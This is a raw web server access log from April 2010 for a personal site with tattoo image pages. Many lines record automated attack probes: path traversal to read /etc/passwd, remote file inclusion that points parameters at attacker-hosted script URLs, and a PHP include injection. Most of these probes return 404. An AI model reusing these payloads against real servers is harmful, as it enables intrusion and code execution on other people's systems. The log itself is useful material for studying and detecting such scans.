195.216.234.1 - - [23/Apr/2010:07:33:49 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
211.255.32.182 - - [23/Apr/2010:07:34:42 -0500] "GET /logs/delete_comment.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:07:34:42 -0500] "GET /logs/access_log.1268611200%20%20/delete_comment.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:07:34:42 -0500] "GET /delete_comment.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.160.224.208 - - [23/Apr/2010:07:34:46 -0500] "GET /logs/access_log.1219708800///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
195.160.224.208 - - [23/Apr/2010:07:34:47 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
204.14.3.162 - - [23/Apr/2010:07:34:49 -0500] "GET /logs/access_log.1219708800///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
204.14.3.162 - - [23/Apr/2010:07:34:50 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [23/Apr/2010:07:34:50 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
195.160.224.208 - - [23/Apr/2010:07:35:02 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
65.55.106.181 - - [23/Apr/2010:07:35:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.255.32.182 - - [23/Apr/2010:07:35:49 -0500] "GET /delete_comment.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:07:35:49 -0500] "GET /logs/delete_comment.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.151.164.53 - - [23/Apr/2010:07:35:51 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:07:35:51 -0500] "GET /logs/access_log.1268611200%20%20/delete_comment.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:07:36:34 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:07:36:34 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:07:36:34 -0500] "GET /logs/access_log.1220054400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:07:36:36 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:07:36:36 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:07:36:36 -0500] "GET /logs/access_log.1220054400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.151.164.53 - - [23/Apr/2010:07:37:25 -0500] "GET /logs/access_log.1220054400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.160.224.208 - - [23/Apr/2010:07:38:25 -0500] "GET /logs/access_log.1212105600///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
67.195.112.180 - - [23/Apr/2010:07:39:33 -0500] "GET /logs/access_log.1194739200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.184 - - [23/Apr/2010:07:41:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.167.15 - - [23/Apr/2010:07:43:20 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
91.121.167.15 - - [23/Apr/2010:07:43:21 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
95.0.234.10 - - [23/Apr/2010:07:47:33 -0500] "GET /logs/access_log.1219708800%20%20/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:47:33 -0500] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:47:33 -0500] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:48:37 -0500] "GET /logs/access_log.1219708800/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:49:37 -0500] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:49:37 -0500] "GET /logs/access_log.1219708800%20%20/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
204.14.3.162 - - [23/Apr/2010:07:49:50 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [23/Apr/2010:07:49:50 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
95.0.234.10 - - [23/Apr/2010:07:49:51 -0500] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.46.204.235 - - [23/Apr/2010:07:51:54 -0500] "GET /logs/access_log.1259366400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.2 - - [23/Apr/2010:07:52:17 -0500] "GET /logs//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.vfc-plauen.de/mobil/361.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
77.221.130.2 - - [23/Apr/2010:07:52:17 -0500] "GET //administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.vfc-plauen.de/mobil/361.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
77.221.130.2 - - [23/Apr/2010:07:52:17 -0500] "GET /logs/access_log.1270684800//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.vfc-plauen.de/mobil/361.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:55:47 -0500] "GET /logs/access_log.1223856000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:55:47 -0500] "GET /logs/access_log.1251504000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:55:50 -0500] "GET /logs/access_log.1219708800%20%20/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:55:50 -0500] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:55:50 -0500] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:55:53 -0500] "GET /logs/access_log.1263945600/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:55:53 -0500] "GET /logs/access_log.1263600000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:56:13 -0500] "GET /logs/access_log.1219708800/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:57:04 -0500] "GET /logs/access_log.1219708800/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:57:28 -0500] "GET /logs/access_log.1223856000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:57:28 -0500] "GET /logs/access_log.1251504000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:57:42 -0500] "GET /logs/access_log.1263945600/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:57:42 -0500] "GET /logs/access_log.1263600000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:58:31 -0500] "GET /logs/access_log.1223856000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:58:31 -0500] "GET /logs/access_log.1251504000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:58:50 -0500] "GET /logs/access_log.1263945600/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:07:58:50 -0500] "GET /logs/access_log.1263600000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.195.112.180 - - [23/Apr/2010:07:58:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "http://www.lotsasites.com/topic?topic=tattoos;id=100;prvw;w=_w""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.217.216.132 - - [23/Apr/2010:08:03:24 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:08:03:24 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:08:03:24 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
202.72.242.242 - - [23/Apr/2010:08:03:37 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
202.72.242.242 - - [23/Apr/2010:08:03:37 -0500] "GET //delete_all.php?board_skin_path=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.72.242.242 - - [23/Apr/2010:08:03:37 -0500] "GET /logs/access_log.1270684800%20%20//delete_all.php?board_skin_path=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:08:05:12 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:08:05:12 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:08:05:12 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:08:13:31 -0500] "GET /logs/access_log.1219449600/////?prefix=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:08:13:31 -0500] "GET /logs/////?prefix=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 200 2845 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:08:13:31 -0500] "GET /////?prefix=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
207.46.199.43 - - [23/Apr/2010:08:17:24 -0500] "GET /logs/access_log.1255737600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.122.89.231 - - [23/Apr/2010:08:17:27 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:29 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:32 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:34 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:34 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:34 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:34 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:35 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:35 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:35 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:35 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:35 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:36 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:43 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:43 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:43 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:43 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:43 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:43 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:43 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:44 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:44 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:44 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:44 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:52 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:52 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:52 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:52 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:53 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:53 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:53 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:53 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:53 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:53 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:17:53 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:02 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:02 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:02 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:02 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:02 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:02 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:03 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:03 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
